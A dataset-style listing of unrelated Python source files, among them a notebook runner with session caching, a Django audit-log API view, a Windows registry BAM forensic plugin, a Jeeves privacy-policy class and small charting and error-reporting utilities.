        inject_code = ['import dill',
                       'dill.load_session(filename="{}")'.format(fname_session),
                       ]

        inject_cell = nbf.v4.new_code_cell('\n'.join(inject_code))
        super().run_cell(inject_cell)

    def session_dump(self, cell, hash, fname_session):
        """
        Dump ipython session to file

        Injects a hidden cell that calls dill.dump_session inside the kernel.
        On serialization failure the cache is disabled for the rest of the run
        and the partial dump is removed.

        :param cell: cell whose session is being dumped (used for error reporting)
        :param hash: cell hash (used for logging)
        :param fname_session: output filename
        :return: True if the session was dumped successfully, False otherwise
        """
        logging.debug('Cell {}: Dumping session to {}'.format(hash, fname_session))

        inject_code = ['import dill',
                       'dill.dump_session(filename="{}")'.format(fname_session),
                       ]

        inject_cell = nbf.v4.new_code_cell('\n'.join(inject_code))
        reply, outputs = super().run_cell(inject_cell)

        errors = list(filter(lambda out: out.output_type == 'error', outputs))
        if len(errors):
            logging.info('Cell {}: Warning: serialization failed, cache disabled'.format(hash))
            logging.debug(
                'Cell {}: Serialization error: {}'.format(hash, CellExecutionError.from_cell_and_msg(cell, errors[0])))
            # disable attempts to retrieve cache for subsequent cells
            self.disable_cache = True
            # remove partial cache for current cell
            os.remove(fname_session)
            return False

        return True

    # fname_session has been created in the filesystem of the system running the kernel,
    # which is the same of the system that is managing the execution of the notebook.
class Notebook:
    """
    Manage Jupyter notebook as Python class/application.

    A notebook is defined either by a 'cells' function (parsed from a file or
    from a subclass method) whose source is split into code/Markdown cells,
    or imported from an existing .ipynb file.  It can then be executed (with
    per-cell caching via CachedExecutePreprocessor) and exported to
    .ipynb/.html/.pynb formats.
    """

    def __init__(self):
        """
        Initialize notebook.
        """
        self.long_name = 'pynb v{} running {} on Python v{}.{}.{}'.format(__version__, self.__class__.__name__,
                                                                          *sys.version_info[:3])
        self.parser = argparse.ArgumentParser(description=self.long_name)
        self.nb = nbf.v4.new_notebook()
        self.nb['cells'] = []
        self.cells_name = None  # human-readable origin of the cells function (for footer)
        self.args = None        # parsed CLI namespace; set by parse_args()

    def add(self, func, **kwargs):
        """
        Parse func's function source code as Python and Markdown cells.

        Triple-quoted ''' lines act as Markdown block delimiters and as cell
        separators; a bare 'return' truncates the notebook.

        :param func: Python function to parse
        :param kwargs: variables to inject as first Python cell
        :return:
        """
        params = set(kwargs.keys())
        func_params = set(inspect.getargspec(func).args)

        # ignore self, which is present when extending Notebook.
        if 'self' in func_params:
            func_params.remove('self')

        if params != func_params:
            fatal('Params {} not matching cells function params {}'.format(list(params), list(func_params)))

        # [1:] skips the 'def ...' line itself.
        lines = inspect.getsourcelines(func)[0][1:]

        buffer = ""
        indent_count = None      # width of the function body's base indentation
        inside_markdown = False  # True while between ''' delimiters
        return_found = False     # NOTE(review): assigned but never used below

        for line in lines:
            # remove base indentation of function 'func'
            if len(line.strip()) > 0:
                if not indent_count:
                    # Measure indentation from the first non-blank body line.
                    indent_count = 0
                    for c in line:
                        if c not in [' ', '\t']:
                            break
                        else:
                            indent_count += 1
                line = line[indent_count:]

            if not inside_markdown and line.strip() == "return":
                logging.info('Encountered "return" statement, ignoring the rest of the notebook.')
                break

            if line.strip() == "'''":  # if md block begin/end, or new cell...
                if len(buffer.strip()) > 0:
                    if not inside_markdown:  # if md block begin: new markdown block! flush buffer
                        self.add_cell_code(buffer)
                    else:  # if md block end: markdown block completed! flush buffer
                        self.add_cell_markdown(buffer)
                    buffer = ""
                inside_markdown = not inside_markdown
            else:
                buffer += line

        # Flush whatever is left after the last delimiter.
        if len(buffer.strip()) > 0:
            if not inside_markdown:
                self.add_cell_code(buffer)
            else:
                self.add_cell_markdown(buffer)

        if len(kwargs) > 0:
            # We have parameters to inject into the notebook.
            # If the first cell is Markdown, assume that is the title and
            # insert parameters as 2nd cell. Otherwise, as 1st cell.
            if len(self.nb['cells']) > 0 and self.nb['cells'][0].cell_type == 'markdown':
                self.add_cell_params(kwargs, 1)
            else:
                self.add_cell_params(kwargs, 0)

    def add_cell_params(self, params, pos=None):
        """
        Add cell of Python parameters

        :param params: parameters to add
        :param pos: optional insertion index for the cell; appended when None
        :return:
        """
        self.params = params

        cell_str = '# Parameters:\n'
        for k, v in params.items():
            cell_str += "{} = {}\n".format(k, repr(v))
        self.add_cell_code(cell_str, pos)

    def add_cell_footer(self):
        """
        Add footer cell
        """
        # check if there's already a cell footer... if true, do not add a second cell footer.
        # this situation happens when exporting to ipynb and then importing from ipynb.
        logging.info('Adding footer cell')
        for cell in self.nb['cells']:
            if cell.cell_type == 'markdown':
                if 'pynb_footer_tag' in cell.source:
                    logging.debug('Footer cell already present')
                    return

        m = """
---
* **Notebook class name**: {class_name}
* **Notebook cells name**: {cells_name}
* **Execution time**: {exec_begin}
* **Execution duration**: {exec_time:.2f}s
* **Command line**: {argv}

[//]: # (pynb_footer_tag)
"""
        self.add_cell_markdown(
            m.format(exec_time=self.exec_time, exec_begin=self.exec_begin_dt, class_name=self.__class__.__name__,
                     argv=str(sys.argv), cells_name=self.cells_name))

    def add_cell_markdown(self, cell_str):
        """
        Add a markdown cell

        :param cell_str: markdown text
        :return:
        """
        logging.debug("add_cell_markdown: {}".format(cell_str))
        # drop spaces and taps at beginning and end of all lines
        # cell = '\n'.join(map(lambda x: x.strip(), cell_str.split('\n')))
        cell = '\n'.join(cell_str.split('\n'))
        cell = nbf.v4.new_markdown_cell(cell)
        self.nb['cells'].append(cell)

    def add_cell_code(self, cell_str, pos=None):
        """
        Add Python cell

        :param cell_str: cell content
        :param pos: optional insertion index; appended when None
        :return:
        """
        cell_str = cell_str.strip()
        logging.debug("add_cell_code: {}".format(cell_str))
        cell = nbf.v4.new_code_cell(cell_str)
        if pos is None:
            self.nb['cells'].append(cell)
        else:
            self.nb['cells'].insert(pos, cell)

    def process(self, uid, add_footer=False, no_exec=False, disable_cache=False, ignore_cache=False):
        """
        Execute notebook

        :param uid: unique id used to key the per-cell cache
        :param add_footer: append the Markdown footer cell after execution
        :param no_exec: build the notebook without executing it
        :param disable_cache: never read or write the cell cache
        :param ignore_cache: recompute cells but still refresh the cache
        :return: self
        """
        self.exec_begin = time.perf_counter()
        self.exec_begin_dt = datetime.datetime.now()

        ep = CachedExecutePreprocessor(timeout=None, kernel_name='python3')
        ep.disable_cache = disable_cache
        ep.ignore_cache = ignore_cache
        ep.uid = uid

        # Execute the notebook
        if not no_exec:
            with warnings.catch_warnings():
                # On MacOS, annoying warning "RuntimeWarning: Failed to set sticky bit on"
                # Let's suppress it.
                warnings.simplefilter("ignore")
                ep.preprocess(self.nb, {'metadata': {'path': '.'}})

        self.exec_time = time.perf_counter() - self.exec_begin

        if add_footer:
            self.add_cell_footer()

        if not no_exec:
            logging.info('Execution time: {0:.2f}s'.format(self.exec_time))

        return self

    def export_ipynb(self, pathname):
        """
        Export notebook to .ipynb file

        :param pathname: output filename; '-' writes to stdout
        :return:
        """
        if pathname == '-':
            nbf.write(self.nb, sys.__stdout__)
        else:
            with codecs.open(pathname, 'w', encoding='utf-8') as f:
                # NOTE(review): return value unused; kept as in original.
                ret = nbf.write(self.nb, f)
                pass
            logging.info("Jupyter notebook exported to '{}'".format(pathname))

    def export_html(self, pathname):
        """
        Export notebook to .html file

        :param pathname: output filename; '-' writes to stdout
        :return:
        """
        html_exporter = HTMLExporter()
        (body, resources) = html_exporter.from_notebook_node(self.nb)

        if pathname == '-':
            sys.__stdout__.write(body)
        else:
            with open(pathname, 'w') as f:
                f.write(body)
            logging.info("HTML notebook exported to '{}'".format(pathname))

    def export_pynb_str(self):
        """Serialize the notebook back to 'cells function' Python source text."""
        s = 'def cells():\n'
        for cell in self.nb['cells']:
            if cell.cell_type == 'markdown':
                s += " '''\n"
                for line in cell.source.splitlines():
                    s += ' {}\n'.format(line)
                s += " '''\n"
            elif cell.cell_type == 'code':
                for line in cell.source.splitlines():
                    s += ' {}\n'.format(line)
            else:
                raise Exception('Unknown cell type: {}'.format(cell.cell_type))
            # Empty ''' ''' pair separates consecutive cells on re-import.
            # NOTE(review): source formatting was flattened; separator assumed
            # per-cell (matches add()'s delimiter-based parsing) -- confirm.
            s += "\n '''\n '''\n\n"
        return s

    def export_pynb(self, pathname):
        """
        Export notebook to .pynb (cells function) Python source.

        :param pathname: output filename; '-' writes to stdout
        :return:
        """
        s = self.export_pynb_str()
        if pathname == '-':
            sys.__stdout__.write(s)
        else:
            with open(pathname, 'w') as f:
                f.write(s)
            logging.info("Python notebook exported to '{}'".format(pathname))

    def add_argument(self, *args, **kwargs):
        """
        Add application argument

        :param args: see parser.add_argument
        :param kwargs: see parser.add_argument
        :return:
        """
        self.parser.add_argument(*args, **kwargs)

    def cells(self, *args, **kwargs):
        # Placeholder: overridden by subclasses, or replaced at runtime by
        # set_cells() when a cells file is given on the command line.
        pass

    def set_cells(self, cells_location):
        """
        Set self.cells to function :cells in file pathname.py

        :param cells_location: cells location, format 'pathname.py:cells'
        :return: (pathname, func_name) tuple
        """
        if ':' in cells_location:
            pathname, func_name = cells_location.split(':')
        else:
            pathname = cells_location
            func_name = 'cells'  # default function name when none is given

        check_isfile(pathname)

        try:
            self.cells = get_func(func_name, pathname)
        except SyntaxError as e:
            fatal(traceback.format_exc(limit=1))

        return pathname, func_name

    def parse_args(self, **kwargs):
        """
        Parse arguments

        :param kwargs: optional params
        :return:
        """
        self.parser.add_argument('cells', help='path to cells function. Format: PATHNAME.PY[:FUNCTION_NAME]', nargs='?')
        self.parser.add_argument('--disable-cache', action="store_true", default=False, help='disable execution cache')
        self.parser.add_argument('--ignore-cache', action="store_true", default=False, help='ignore existing cache')
        self.parser.add_argument('--no-exec', action="store_true", default=False, help='do not execute notebook')
        self.parser.add_argument('--param', action='append', help='notebook parameter. Format: NAME=VALUE')

        self.add_argument('--import-ipynb', help='import from Jupyter notebook')
        self.add_argument('--export-html', help='export to HTML format')
        self.add_argument('--export-ipynb', help='export to Jupyter notebook')
        self.add_argument('--export-pynb', help='export to Python notebook')
        self.add_argument('--kernel', default=None, help='set kernel')
        self.add_argument('--log-level', help='set log level')
        self.add_argument('--check-syntax', action="store_true", default=False, help='check Python syntax')
        self.add_argument('--disable-footer', action="store_true", default=False,
                          help='do not append Markdown footer to Jupyter notebook')

        if len(sys.argv) == 1 and self.__class__ == Notebook:
            # no parameters and Notebook class not extended:
            # print help and exit.
            self.parser.print_help()
            print()
            sys.exit(1)

        self.args = self.parser.parse_args()

    def load_cells_params(self):
        """Resolve the cells function and its parameters; return the cache uid."""
        if self.args.cells:
            # module and function name passed with args.cells parameter
            pathname, func_name = self.set_cells(self.args.cells)
            logging.info('Loading cells from {}'.format(self.args.cells))
            uid = '{}:{}'.format(os.path.abspath(pathname), func_name)
            self.cells_name = self.args.cells
        else:
            # Notebook class extended, .cells method contains the target cell
            # Let's make sure that this is the case...
            if self.__class__ == Notebook:
                fatal('Notebook class not extended and cells parameter is missing')
            logging.info('Loading notebook {}'.format(self.__class__.__name__))
            uid = '{}:{}'.format(os.path.abspath(inspect.getfile(self.__class__)), self.__class__.__name__)

        # Process parameters passed by custom arguments
        # NOTE(review): inspect.getargspec is deprecated (removed in Py3.11);
        # getfullargspec is the modern equivalent.
        arg_spec = inspect.getargspec(self.cells)
        func_params = arg_spec.args

        # Get default parameters
        default_params = arg_spec.defaults

        self.kwargs = {}

        if default_params:
            default_args_with_value = dict(zip(func_params[-len(default_params):], default_params))
            logging.debug('Found default values {}'.format(default_args_with_value))
            # Add default values to kwargs
            self.kwargs.update(default_args_with_value)

        if not self.args.cells:
            # self is always present in case of subclassed Notebook, since cells(self, ...) is a method.
            func_params.remove('self')

            # NOTE(review): source indentation was flattened; this seeding loop
            # is assumed to belong to the subclass branch (seeding from custom
            # CLI arguments) so that file-based defaults survive -- confirm
            # against upstream pynb.
            for param in func_params:
                self.kwargs[param] = getattr(self.args, param, None)

        # Process parameters passed with --param
        if self.args.param:
            for param in self.args.param:
                k, v = param.split('=', 1)
                self.kwargs[k] = v

        # Check parameters completeness
        for param in func_params:
            if self.kwargs[param] is None:
                fatal('Notebook parameter {} required but not found'.format(param))

        logging.info('Parameters: {}'.format(self.kwargs))

        self.add(self.cells, **self.kwargs)

        return uid

    def get_kernelspec(self, name):
        """Get a kernel specification dictionary given a kernel name
        """
        ksm = KernelSpecManager()
        kernelspec = ksm.get_kernel_spec(name).to_dict()
        kernelspec['name'] = name
        # argv contains host-specific launch paths; drop it from metadata.
        kernelspec.pop('argv')
        return kernelspec

    def set_kernel(self, name):
        """Record kernel metadata on the notebook so it executes/exports with *name*."""
        kernelspec = self.get_kernelspec(name)
        metadata = {'language': 'python',
                    'kernelspec': kernelspec}
        self.nb.update(metadata=metadata)

    def run(self):
        """
        Run notebook as an application: parse CLI args, build or import the
        notebook, execute it, and perform any requested exports.

        :return:
        """
        if not self.args:
            self.parse_args()

        if self.args.log_level:
            logging.getLogger().setLevel(logging.getLevelName(self.args.log_level))
            logging.debug('Enabled {} logging level'.format(self.args.log_level))

        if self.args.import_ipynb:
            check_isfile(self.args.import_ipynb)
            logging.info('Loading Jupyter notebook {}'.format(self.args.import_ipynb))
            self.nb = nbf.read(self.args.import_ipynb, as_version=4)
            uid = self.args.import_ipynb
        else:
            uid = self.load_cells_params()

        logging.debug("Unique id: '{}'".format(uid))
        logging.info('Disable cache: {}'.format(self.args.disable_cache))
        logging.info('Ignore cache: {}'.format(self.args.ignore_cache))

        # export_pynb round-trips source text only; executing first would
        # bake outputs into the cells, so it is only valid with --no-exec.
        if self.args.export_pynb and not self.args.no_exec:
            fatal('--export-pynb requires --no-exec')

        if self.args.kernel:
            self.set_kernel(self.args.kernel)

        self.process(uid=uid,
                     add_footer=not self.args.disable_footer,
                     no_exec=self.args.no_exec,
                     disable_cache=self.args.disable_cache,
                     ignore_cache=self.args.ignore_cache)

        if self.args.export_html:
            self.export_html(self.args.export_html)

        if self.args.export_ipynb:
            self.export_ipynb(self.args.export_ipynb)

        if self.args.export_pynb:
            self.export_pynb(self.args.export_pynb)
def main():
    """Entry point for the ``pynb`` command: build a Notebook and run it."""
    Notebook().run()


if __name__ == "__main__":
    main()
|
1691351
|
from django.shortcuts import render
from rest_framework.views import APIView
from rest_framework.response import Response
from django.db.models import Q
from user.permissions import CustomerPremission
from rest_framework.permissions import IsAuthenticated, IsAdminUser, IsAuthenticatedOrReadOnly, AllowAny
import time,datetime
from easyaudit.models import *
from easyaudit.serializers import *
from user.models import *
class CRUDEventViewSet(APIView):
    """
    Return system operation (CRUD) audit logs.

    POST body may contain:
      * ``timerange`` -- [date_from, date_to] pair limiting the search window;
      * ``username``  -- substring matched against user names.
    Without filters, events from the last 7 days are returned.  Events that
    touched ``jwt_secret`` are always excluded.
    """
    # Permissions
    permission_classes = [CustomerPremission, IsAuthenticated]
    module_perms = ['easyaudit:crudevent']

    @staticmethod
    def _serialize(logs):
        # One place for the queryset -> list-of-dicts conversion that was
        # previously duplicated four times.
        return [CRUDEventSerializer(log).data for log in logs]

    def post(self, request, format=None):
        # Idiomatic .get() instead of `x['k'] if 'k' in x else None`.
        timerange = request.data.get('timerange')
        username = request.data.get('username')
        # Lower bound used when no explicit time range is given (last 7 days).
        laste_time = (datetime.date.today() - datetime.timedelta(days=7)).strftime('%Y-%m-%d %X')
        # Never expose events that changed the jwt_secret field.
        no_jwt = ~Q(changed_fields__icontains='jwt_secret')

        results = []
        if timerange is None and username is None:
            # Default view: last 7 days, only events with a known user.
            results = self._serialize(
                CRUDEvent.objects.filter(Q(datetime__gt=laste_time), Q(user__isnull=False), no_jwt).order_by('-id'))
        elif timerange and username is None:
            date_from, date_to = timerange[0], timerange[1]
            results = self._serialize(
                CRUDEvent.objects.filter(Q(datetime__range=(date_from, date_to)), Q(user__isnull=False),
                                         no_jwt).order_by('-id'))
        elif username:
            # Resolve matching user ids first; CRUDEvent stores the user pk as string.
            user_id_list = [row['id'] for row in Users.objects.filter(Q(username__contains=username)).values('id')]
            if timerange:
                date_from, date_to = timerange[0], timerange[1]
                results = self._serialize(
                    CRUDEvent.objects.filter(Q(datetime__range=(date_from, date_to)),
                                             Q(user_pk_as_string__in=user_id_list), no_jwt).order_by('-id'))
            else:
                results = self._serialize(
                    CRUDEvent.objects.filter(Q(datetime__gt=laste_time),
                                             Q(user_pk_as_string__in=user_id_list), no_jwt).order_by('-id'))

        return Response({'results': results})
|
1691355
|
import logging
from construct import Int64ul
from regipy.exceptions import RegistryKeyNotFoundException
from regipy.hive_types import SYSTEM_HIVE_TYPE
from regipy.plugins.plugin import Plugin
from regipy.utils import convert_wintime
logger = logging.getLogger(__name__)

# Control-set-relative registry path of the BAM per-user activity keys.
BAM_PATH = r'Services\bam\UserSettings'


class BAMPlugin(Plugin):
    """Parse Background Activity Moderator (BAM) entries from a SYSTEM hive."""

    NAME = 'background_activity_moderator'
    # BUG FIX: description previously read 'Get the computer name', copy-pasted
    # from another plugin; it now describes this plugin.
    DESCRIPTION = 'Get the Background Activity Moderator (BAM) data'
    COMPATIBLE_HIVE = SYSTEM_HIVE_TYPE

    def run(self):
        # BUG FIX: startup log said 'Computer Name Plugin'; corrected to BAM.
        logger.info('Started Background Activity Moderator Plugin...')
        try:
            # BAM keys exist once per control set; iterate all of them.
            for subkey_path in self.registry_hive.get_control_sets(BAM_PATH):
                subkey = self.registry_hive.get_key(subkey_path)
                for sid_subkey in subkey.iter_subkeys():
                    sid = sid_subkey.name
                    logger.info(f'Parsing BAM for {sid}')
                    sequence_number = None
                    version = None
                    entries = []
                    for value in sid_subkey.get_values():
                        if value.name == 'SequenceNumber':
                            sequence_number = value.value
                        elif value.name == 'Version':
                            version = value.value
                        else:
                            # Any other value name is an executable path; its data
                            # is parsed as a 64-bit LE Windows timestamp.
                            entries.append({
                                'executable': value.name,
                                'timestamp': convert_wintime(Int64ul.parse(value.value), as_json=self.as_json)
                            })
                    # Attach the per-SID metadata to every executable entry.
                    self.entries.extend([
                        {
                            'sequence_number': sequence_number,
                            'version': version,
                            'sid': sid,
                            **x
                        } for x in entries]
                    )
        except RegistryKeyNotFoundException as ex:
            # Hive without BAM keys (older Windows): log and return empty.
            logger.error(ex)
|
1691378
|
from datetime import *
import sys
sys.path.append("../../..")
import JeevesLib
from smt.Z3 import *
import macropy.activate
from users import *
from assignment import *
class Submission():
    """An assignment submission guarded by Jeeves information-flow labels.

    Grade, file contents and title are faceted values: the submitter and
    instructors see the real value, everyone else sees a default
    (-1 for the grade, "N/A" for text fields).
    """

    def __init__(self, submissionId, title, assignmentId, submitterId, fileRef):
        self.submissionId = submissionId
        self.title = title
        self.assignmentId = assignmentId
        self.submitterId = submitterId
        self.fileRef = fileRef
        self.grade = None
        # (removed a dead `self.submittedOn = ""` that was immediately
        # overwritten by the line below)
        self.submittedOn = datetime.now()

        JeevesLib.init()

        ## Policies ##
        def _isUser(context):
            return isinstance(context, User)

        def _isSubmitter(context):
            return context.userId == self.submitterId

        def _isInstructor(context):
            return isinstance(context, Instructor)

        ## Labels ##
        self._viewerL = JeevesLib.mkLabel()
        self._editorL = JeevesLib.mkLabel()
        self._adminL = JeevesLib.mkLabel()

        ## Restrict Labels ##
        # viewer: submitter or any instructor; editor: submitter; admin: instructor.
        JeevesLib.restrict(self._viewerL, lambda oc: JeevesLib.jor(lambda: _isSubmitter(oc), lambda: _isInstructor(oc)))
        JeevesLib.restrict(self._editorL, lambda oc: _isSubmitter(oc))
        JeevesLib.restrict(self._adminL, lambda oc: _isInstructor(oc))

    ## Getter, Setters, and Show-ers ##

    # Grade
    def getGrade(self):
        # BUG FIX: was `mkSensitive(_viewerL, ...)` -- `_viewerL` is not a name
        # in scope here (NameError at call time); the label lives on self.
        score = JeevesLib.mkSensitive(self._viewerL, self.grade, -1)
        return score

    def setGrade(self, score):
        # Would it be better to store score as a concretized value?
        # It wouldn't work as well for a database, but possibly in simple examples
        self.grade = score

    def showGrade(self, context):
        faceted_value = self.getGrade()
        return JeevesLib.concretize(context, faceted_value)

    # Submission Details (fileRef)
    def getSubmissionDetails(self):
        details = JeevesLib.mkSensitive(self._viewerL, self.fileRef, "N/A")
        return details

    def setSubmissionDetails(self, text):
        self.fileRef = text

    def showSubmissionDetails(self, context):
        return JeevesLib.concretize(context, self.getSubmissionDetails())

    # Submission Title
    def getTitle(self):
        details = JeevesLib.mkSensitive(self._viewerL, self.title, "N/A")
        return details

    def setTitle(self, title):
        self.title = title

    def showTitle(self, context):
        return JeevesLib.concretize(context, self.getTitle())

    ## Magic Methods ##
    def __repr__(self):
        # Shows raw (non-faceted) fields.
        # NOTE(review): 'Submisison' misspelling kept for output compatibility.
        return "Submisison(%d, %s, %s)" % (self.submissionId, self.title, self.fileRef)

    def __eq__(self, other):
        # Equality on id + title only; other fields are ignored.
        if isinstance(other, self.__class__):
            return self.submissionId == other.submissionId and self.title == other.title
        else:
            return False

    def __ne__(self, other):
        return not self.__eq__(other)
|
1691428
|
from pyecharts import options as opts
from pyecharts.charts import EffectScatter
from pyecharts.faker import Faker
# Build the chart step by step instead of one fluent chain; each add_/set_
# call returns the chart itself, and render() returns the output path.
chart = EffectScatter()
chart.add_xaxis(Faker.choose())
chart.add_yaxis("", Faker.values())
chart.set_global_opts(
    title_opts=opts.TitleOpts(title="EffectScatter-显示分割线"),
    xaxis_opts=opts.AxisOpts(splitline_opts=opts.SplitLineOpts(is_show=True)),
    yaxis_opts=opts.AxisOpts(splitline_opts=opts.SplitLineOpts(is_show=True)),
)
c = chart.render("effectscatter_splitline.html")
|
1691430
|
from .token import coord
from termcolor import colored as X
import os.path
import sys
def show_line(pos, hi=lambda x: X(x, 'red', attrs=['bold'])):
    """Print the source line at *pos* and underline the offending span.

    :param pos: location object with .file, .line (1-based), .col (1-based)
                and .len attributes
    :param hi: highlighter applied to the caret/tilde marker (defaults to
               bold red via termcolor)

    Silently returns when pos has no file or the file does not exist.
    """
    if not pos.file:
        return
    if not os.path.isfile(pos.file):
        return
    with open(pos.file) as tmp:
        # enumerate(..., start=1) instead of manually comparing num + 1.
        for num, line in enumerate(tmp, start=1):
            if num == pos.line:
                print(line, end='')
                # Caret under the start column, tildes under the rest.
                print(' ' * (pos.col - 1), hi('^'), hi('~' * (pos.len - 1)), sep='')
                break
def abort(fmt, *args, pos=coord()):
    """Report a fatal error at *pos*, show the offending source line, exit(1)."""
    tag = X('error', 'red')
    message = '{}: {!s}{}'.format(tag, pos, fmt.format(*args))
    print(message)
    show_line(pos)
    sys.exit(1)
def warn(fmt, *args, pos=coord()):
    """Print a non-fatal warning at *pos* with the source line highlighted in blue."""
    tag = X('warning', 'blue')
    message = '{}: {!s}{}'.format(tag, pos, fmt.format(*args))
    print(message)
    show_line(pos, hi=lambda text: X(text, 'blue', attrs=['bold']))
def hint(fmt, *args, pos=coord()):
    """Print an informational hint at *pos* with the source line highlighted in green."""
    tag = X('hint', 'green')
    message = '{}: {!s}{}'.format(tag, pos, fmt.format(*args))
    print(message)
    show_line(pos, hi=lambda text: X(text, 'green', attrs=['bold']))
def panic(fmt, *args, pos=coord()):
    """Raise an Exception carrying the position-prefixed message (internal errors)."""
    message = '{!s}{}'.format(pos, fmt.format(*args))
    raise Exception(message)
|
1691437
|
from tests.utils import W3CTestCase
class TestBidiOverride(W3CTestCase):
    """W3C test-suite binding for the 'bidi-override-*' reference files.

    vars() inside a class body is the class namespace under construction;
    updating it injects one auto-generated test per discovered reference
    file as a class attribute.
    """
    vars().update(W3CTestCase.find_tests(__file__, 'bidi-override-'))
|
1691475
|
from .processors import InputExample, InputFeatures, DataProcessor
from .processors import glue_output_modes, glue_processors, glue_tasks_num_labels, glue_convert_examples_to_features
from .processors import xnli_output_modes, xnli_processors, xnli_tasks_num_labels
from .metrics import is_sklearn_available
if is_sklearn_available():
from .metrics import glue_compute_metrics, xnli_compute_metrics
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.